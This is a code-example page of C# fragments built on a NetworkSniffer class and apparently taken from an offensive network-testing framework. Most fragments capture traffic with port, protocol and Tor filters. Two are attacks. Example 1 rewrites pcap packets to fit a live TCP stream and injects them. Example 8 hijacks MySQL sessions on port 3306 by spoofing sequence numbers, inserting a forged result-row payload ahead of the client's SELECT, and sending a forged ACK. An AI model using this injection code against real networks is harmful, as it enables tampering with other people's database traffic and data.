Beispiel #1
0
        void Inject(NetworkSniffer sniffer, TcpStream stream, Packet[] packets)
        {
            WriteInfo("Injecting packets");

            foreach (EthernetPacket p in packets)
            {
                // Override ethernet
                p.DestinationHwAddress = stream.DestinationHwAddress;
                p.SourceHwAddress      = stream.SourceHwAddress;
                p.UpdateCalculatedValues();

                IpPacket ip = (IpPacket)p.PayloadPacket;
                ip.SourceAddress      = stream.Source.Address;
                ip.DestinationAddress = stream.Destination.Address;
                ip.UpdateCalculatedValues();

                if (ip.Protocol != IPProtocolType.TCP)
                {
                    continue;
                }

                TcpPacket tcp = (TcpPacket)ip.PayloadPacket;
                tcp.SourcePort      = (ushort)stream.Source.Port;
                tcp.DestinationPort = (ushort)stream.Destination.Port;
                tcp.UpdateCalculatedValues();

                // Send
                sniffer.Send(p);
            }
        }
Beispiel #2
0
        public override ECheck Check()
        {
            NetworkSniffer s = null;

            try
            {
                //if (!SystemHelper.IsAdministrator())
                //    WriteError("Require admin rights");

                IPayloadSniffer pay = (IPayloadSniffer)Payload;
                if (!pay.Check())
                {
                    return(ECheck.Error);
                }

                s = new NetworkSniffer(Interface);
                s.Start();

                return(ECheck.Ok);
            }
            catch { return(ECheck.Error); }
            finally
            {
                if (s != null)
                {
                    s.Dispose();
                }
            }
        }
Beispiel #3
0
        public override ECheck Check()
        {
            NetworkSniffer s = null;

            try
            {
                if (!SystemHelper.IsAdministrator())
                {
                    WriteError("Require admin rights");
                }

                if (!DumpFolder.Exists)
                {
                    WriteError("DumpFolder must exists");
                    return(ECheck.Error);
                }

                s        = new NetworkSniffer(LocalAddress);
                s.Filter = new SnifferPortFilter(this.LocalPort);
                s.Start();

                return(ECheck.Ok);
            }
            catch { return(ECheck.Error); }
            finally
            {
                if (s != null)
                {
                    s.Dispose();
                }
            }
        }
Beispiel #4
0
        public override bool Run()
        {
            IPayloadSniffer pay = (IPayloadSniffer)Payload;

            //if (!SystemHelper.IsAdministrator())
            //    WriteError("Require admin rights");
            if (!pay.Check())
            {
                return(false);
            }
            if (FilterOnlyTorRequest)
            {
                TorHelper.UpdateTorExitNodeList(true);
            }

            NetworkSniffer s = new NetworkSniffer(Interface)
            {
                Timeout     = TcpTimeout,
                TimeoutSync = TcpTimeoutSync
            };

            s.StartTcpStreamMethod = StartTcpStreamMethod;
            s.OnDequeue           += pay.Dequeue;

            if (!string.IsNullOrEmpty(Filter))
            {
                s.Filter = Filter;
            }
            if (pay.CaptureOnTcpStream)
            {
                s.OnTcpStream += pay.OnTcpStream;
            }
            if (pay.CaptureOnPacket)
            {
                s.OnPacket += pay.OnPacket;
            }

            List <IIpPacketFilter> filters = new List <IIpPacketFilter>();

            if (FilterOnlyTorRequest)
            {
                filters.Add(new SnifferTorFilter());
            }
            if (FilterPorts != null && FilterPorts.Length > 0)
            {
                filters.Add(new SnifferPortFilter(FilterPorts));
            }
            if (FilterProtocols != null && FilterProtocols.Length > 0)
            {
                filters.Add(new SnifferProtocolFilter(FilterProtocols));
            }

            s.Filters        = filters.ToArray();
            s.OnCaptureStop += S_OnCaptureStop;
            s.Start();

            CreateJob(s, "IsDisposed");
            return(true);
        }
Beispiel #5
0
        public bool Check()
        {
            packets = NetworkSniffer.ReadAllPacketsFromPcap(SendPcap.FullName).Where(u => u is EthernetPacket).Cast <EthernetPacket>().ToArray();

            if (packets != null && packets.Length > 0)
            {
                WriteInfo("Packets for injection", packets.Length.ToString(), System.ConsoleColor.Cyan);
                return(true);
            }

            WriteInfo("Not packet found");
            return(false);
        }
Beispiel #6
0
        static void Main(string[] args)
        {
            // Creamos el sniffer, que capturará el puerto 3306 en tcp
            using (NetworkSniffer ns = new NetworkSniffer("Ethernet"))
            {
                ns.Filter  = "tcp";
                ns.Filters = new IIpPacketFilter[] { new SnifferPortFilter(3306) };

                ns.OnPacket += Ns_OnPacket;

                ns.Start();

                Console.WriteLine("Press any key for exit");
                Console.ReadKey();
            }
        }
Beispiel #7
0
        public override bool Run()
        {
            if (!SystemHelper.IsAdministrator())
            {
                WriteError("Require admin rights");
            }

            if (!DumpFolder.Exists)
            {
                return(false);
            }

            NetworkSniffer s = new NetworkSniffer(LocalAddress);

            s.OnTcpStream += s_OnTcpStream;
            s.Filter       = new SnifferPortFilter(this.LocalPort);
            s.Start();

            CreateJob(s);
            return(true);
        }
Beispiel #8
0
        static void Ns_OnPacket(object sender, IPProtocolType protocolType, EthernetPacket packet)
        {
            NetworkSniffer ns = (NetworkSniffer)sender;
            IPv4Packet     ip = (IPv4Packet)packet.PayloadPacket;
            TcpPacket      t  = (TcpPacket)ip.PayloadPacket;

            // Si el paquete recibido es el de respuesta OK del mysql
            if (t.PayloadData.SequenceEqual(ResponseOk))
            {
                Parent = packet;

                // Replicamos el paquete, enviando el payload de la fila, si, antes de recibir el SELECT
                LastSequenceId = (uint)(t.SequenceNumber + t.PayloadData.Length);
                ip.Id++;
                t.SequenceNumber = LastSequenceId;
                t.OptionsCollection.Clear();

                t.PayloadData = Payload;
                t.Ack         = true;
                t.Psh         = true;

                ip.UpdateCalculatedValues();
                t.UpdateCalculatedValues();

                ip.UpdateIPChecksum();
                t.UpdateTCPChecksum();

                ns.Send(packet);

                LastSequenceId = (uint)(t.SequenceNumber + t.PayloadData.Length);
                Console.WriteLine(t.ToString(StringOutputType.Verbose));
            }
            else
            {
                // Si el paquete contiene el valor SELECT
                string ascii = Encoding.ASCII.GetString(t.PayloadData);
                if (Parent != null && ascii.Contains("SELECT"))
                {
                    // Ya no actuamos mas
                    ns.OnPacket -= Ns_OnPacket;

                    ip = (IPv4Packet)Parent.PayloadPacket;
                    t  = (TcpPacket)ip.PayloadPacket;

                    // Enviamos un ACK del paquete recibido, para darle por bueno
                    t.SequenceNumber       = LastSequenceId;
                    t.AcknowledgmentNumber = t.AcknowledgmentNumber;
                    t.PayloadData          = new byte[] { };
                    ip.Id++;
                    t.Ack = true;
                    t.Psh = false;

                    ip.UpdateCalculatedValues();
                    t.UpdateCalculatedValues();

                    ip.UpdateIPChecksum();
                    t.UpdateTCPChecksum();

                    ns.Send(packet);
                    Console.WriteLine(t.ToString(StringOutputType.Verbose));
                }
            }
        }